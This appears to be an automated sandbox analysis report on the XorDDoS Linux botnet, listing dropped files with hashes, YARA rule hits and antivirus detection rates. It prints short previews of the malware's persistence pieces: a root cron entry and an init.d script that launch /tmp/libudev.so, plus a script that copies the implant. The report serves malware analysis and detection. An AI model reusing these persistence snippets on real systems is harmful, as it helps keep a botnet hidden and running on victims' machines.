                                                                                                                                      rJabrNEtBMGet hashmaliciousBrowse
                                                                                                                                        c1152b89-b68a-49af-af67-fd4b61683a72Get hashmaliciousBrowse
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:POSIX shell script, ASCII text executable
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):228
                                                                                                                                          Entropy (8bit):4.807897441464882
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                                                                                                          MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                                                                                                          SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                                                                                                          SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                                                                                                          SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: 23.vir, Detection: malicious, Browse
                                                                                                                                          • Filename: 23.vir, Detection: malicious, Browse
                                                                                                                                          • Filename: xor1.o, Detection: malicious, Browse
                                                                                                                                          • Filename: CCCxor.o, Detection: malicious, Browse
                                                                                                                                          • Filename: 2BAFxor.o, Detection: malicious, Browse
                                                                                                                                          • Filename: task2.bin, Detection: malicious, Browse
                                                                                                                                          • Filename: task2.bin, Detection: malicious, Browse
                                                                                                                                          • Filename: task2.bin, Detection: malicious, Browse
                                                                                                                                          • Filename: 0Xorddos.o, Detection: malicious, Browse
                                                                                                                                          • Filename: x.o, Detection: malicious, Browse
                                                                                                                                          • Filename: 23, Detection: malicious, Browse
                                                                                                                                          • Filename: 23, Detection: malicious, Browse
                                                                                                                                          • Filename: XZFWLZVF1Z, Detection: malicious, Browse
                                                                                                                                          • Filename: EgrT0zBhDa, Detection: malicious, Browse
                                                                                                                                          • Filename: 4ljhdTTyiA, Detection: malicious, Browse
                                                                                                                                          • Filename: 7nJAEBDitl, Detection: malicious, Browse
                                                                                                                                          • Filename: ygljglkjgfg0, Detection: malicious, Browse
                                                                                                                                          • Filename: bVexvNSHcD, Detection: malicious, Browse
                                                                                                                                          • Filename: rJabrNEtBM, Detection: malicious, Browse
                                                                                                                                          • Filename: c1152b89-b68a-49af-af67-fd4b61683a72, Detection: malicious, Browse
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                                                                                                          Process:/bin/sh
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41
                                                                                                                                          Entropy (8bit):3.8484226636198593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                                                                                                          MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                                                                                                          SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                                                                                                          SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                                                                                                          SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:*/3 * * * * root /etc/cron.hourly/gcc.sh.
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:POSIX shell script, ASCII text executable
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):315
                                                                                                                                          Entropy (8bit):5.211867359465572
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:hUtoFdU9JfdnsKheJsKGBE21YJvmNeMwhcBZv1DzRIMMHU06Mz/MHUQ4:63VmQBEMO1cB/zuVRzue
                                                                                                                                          MD5:BF54F9789E5F436B41DAE0338B907708
                                                                                                                                          SHA1:A1D61DC0A80DB7AC81BAF8772E4DDD076CB6706B
                                                                                                                                          SHA-256:F48633BD1909A10D98BDF0C032CB414EE35185365C036130DB1C058D2D9B2232
                                                                                                                                          SHA-512:5F8218AA3A450BB307095203493CC8C09C1640BDBB534BFEC659B0790BAA46E87A61A4133C9E264ECC3CE22AB42898843724CCEA26110A88F550F49DAFBACE7E
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /etc/init.d/libudev.so, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /etc/init.d/libudev.so, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /etc/init.d/libudev.so, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: libudev.so.### BEGIN INIT INFO.# Provides:..libudev.so.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.libudev.so.### END INIT INFO.case $1 in.start)../tmp/libudev.so..;;.stop)..;;.*)../tmp/libudev.so..;;.esac.
                                                                                                                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):76
                                                                                                                                          Entropy (8bit):3.7627880354948586
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32
                                                                                                                                          Entropy (8bit):3.8667292966721747
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:hxkNLCBe3eJn:3Be3eJ
                                                                                                                                          MD5:178357FF9498F2924C0B166350B68EF8
                                                                                                                                          SHA1:04B37951723D56937BEC2CFBAC7D305D8B48D643
                                                                                                                                          SHA-256:C546B70A2AF029501ED397D6E1B6CA13DFFDF3BCB4D70A6F527B84B287CF9335
                                                                                                                                          SHA-512:C1EF19315A51378335FD9408740FC831ACEE2C9C4A487272AD744B17CF13C5D225FAECD923354521C4C92834449D8425AE2C3AD44ABD3B3F46C0811897A1A003
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:hpdeqahpgbcapebgwhuhvgxpxsmyeuxn
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.2444116274548
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/917
                                                                                                                                          MD5:9731334739440E32B8E810CCDDD96C17
                                                                                                                                          SHA1:C2DC6EAD22CB26294ED5900E7A55CA0115570CEE
                                                                                                                                          SHA-256:57FB6B122CA587AA9BBCF3AFC7E69A0E59ED20004CE1DA3255F133AF825C34FA
                                                                                                                                          SHA-512:8220A29E82CC269D5F9252507470F55814879F2D296FC47C54EE14737FAA8F1D517CF86671D1D836A011BC2194AF259642ABA17964AE1D4C5F732C58669AD3D7
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bnuowhwlvc, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/bnuowhwlvc, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/bnuowhwlvc, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244410674220444
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AY:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91F
                                                                                                                                          MD5:CD015FF5581523F795A9CDFF85751E4E
                                                                                                                                          SHA1:5B557133107AD96754926D7657E213C74CAD8C3B
                                                                                                                                          SHA-256:4144C42F7B0BEF3AB02F53EE82E5D2C10566BD007FF35EF47A2D264AD353C184
                                                                                                                                          SHA-512:955277B6C7705B58138CE98F8586A06F51B915B4D7E9B303FA7F7558AD174B3F1FB47E2BD4855684E743AABFF448C37F95FA7074158099DAB868620586FCFE1A
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/chrcfbeejh, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/chrcfbeejh, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/chrcfbeejh, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244399538636041
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AJ:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91U
                                                                                                                                          MD5:671FB9E6C4188B2C387307EE031F7816
                                                                                                                                          SHA1:CC0E122850BADABC5BEB48F71D28311C89427E2C
                                                                                                                                          SHA-256:1FD66F398B574A5DAF73CD5DAF9B15E57791F9938DBC766994D01727BC5F181C
                                                                                                                                          SHA-512:074C4C63522E60CBEFBA956326D818670D5E7E8456ABF2230471638CD3C99A56A80EF2C698515B3BD8BB5878F03BA44B93821CB06996AE1B4112A438D9A793D4
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cjrbrkowir, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cjrbrkowir, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/cjrbrkowir, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.24439559594153
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ag:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91Z
                                                                                                                                          MD5:637B8BB85E23041FE2F4A3767C0E251B
                                                                                                                                          SHA1:F5810DD48CDBBD8FC4FFC3DCA2999597AFCAE0C1
                                                                                                                                          SHA-256:F86589362D67A622DAB30F561B2257CDBA45E10D1D59FE4868A6469652275FF8
                                                                                                                                          SHA-512:6BEE406D40D31F474F38EA62353CD48686A0CBDFDA28B680D3776D2894DD8DA7ECAAACFD5FFDAF84DB44A906B31EFA282D053D4767D7DDC01BBAC4207B6E4BEF
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ctwojuywol, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ctwojuywol, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ctwojuywol, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244401429953211
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AR:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91I
                                                                                                                                          MD5:E446FFF5F449758979147B09C39CEF27
                                                                                                                                          SHA1:2291B21642E3A51FF57075133363EA9300B98A93
                                                                                                                                          SHA-256:E97D595ECDBC961B140AA64E460FA8A1D851D4220DAA01AA91A2FCA5FC2078D3
                                                                                                                                          SHA-512:B7248A1C007AA47CB794B337FA95569C08D5EBD52EE6C281BB9FA2AADDF6414ABCB28FCA06B1DB62D183D1F9AE05F879DA8F21116B575A2FD3EDC60893F45DE2
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/fsqerkomug, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/fsqerkomug, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/fsqerkomug, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):610304
                                                                                                                                          Entropy (8bit):6.209349289572672
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl3
                                                                                                                                          MD5:96320734381749DA66B251CF007D8FF5
                                                                                                                                          SHA1:8DFA9E396C77317A2938AE9DBDA5BED0F747C673
                                                                                                                                          SHA-256:0774FEC8F52346211FC87FCB41318D9BD3ED00A1F00D9D13E10FE64F8313661B
                                                                                                                                          SHA-512:ECF20530AD8A53E9C5515B83FF2410F55C6BD8B4F8A82AF5BE2BE80C73C0A3920DC23E04534BB4161F5368D483F5D54F24D9B645D7312BC6E42BCED37A0F4B96
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hfdnmorvjd, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hfdnmorvjd, Author: ditekSHen
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244401761764392
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AW:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/917
                                                                                                                                          MD5:49D50C6D28B847418207973B5AEB45E4
                                                                                                                                          SHA1:A7CB6237A0199E0F1FDEFF31F1565372E8D5B723
                                                                                                                                          SHA-256:16FA377A73D51D7BAD9D7757A372E9BD2D424ABD4AED6FD7A1CB7A7D9D2752B6
                                                                                                                                          SHA-512:BE179D4B78D72FB047AD3F0274057F5D3F60654AC45BD901BE566DFAAC20EC983522A027D4750E9000D95D1DFD39E3FBEF4252730BC0E3AD51ABD28F6442F67A
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/jjfbelholv, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/jjfbelholv, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/jjfbelholv, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244407971496464
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AQ:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91N
                                                                                                                                          MD5:D750C8BEAC9F7E938ED3D56311D9B66C
                                                                                                                                          SHA1:D60A1D890B0818FE14114985CC745EDCDAF3E848
                                                                                                                                          SHA-256:7C79961096405549E67B12EFEE4659760C4CDF09B635534DCA531503D2241323
                                                                                                                                          SHA-512:CCD7CB479C7EEE4E278128C741D9C2AD2054C8FAC2389C7FA8AD778332EF75FD01D35961EBBC5947448E2484F86B95E3B1B79459FCC4B0AD12F2552665344ACD
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mljnlxkfff, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mljnlxkfff, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/mljnlxkfff, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244403687487224
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AW:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91P
                                                                                                                                          MD5:F03F39E4AAF6A5CA7A154972E56405F7
                                                                                                                                          SHA1:F657F6FCCF1664B9506DAD10F806916D7192FBF7
                                                                                                                                          SHA-256:A08D2CA52B895B7FA9B5812F0554223654EF5E03995DCD7CB7BCA748B30E2BDC
                                                                                                                                          SHA-512:BDCF4146042D416EF020146F28D7E4A9EFA4E84798688D12EAEA6260C2846C46EFD1F44AA909A291A2DFAC26A7722DD7116FD8E2D7FC0B6B5DF56EF1D9E11FD8
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tiupbsaswr, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tiupbsaswr, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tiupbsaswr, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
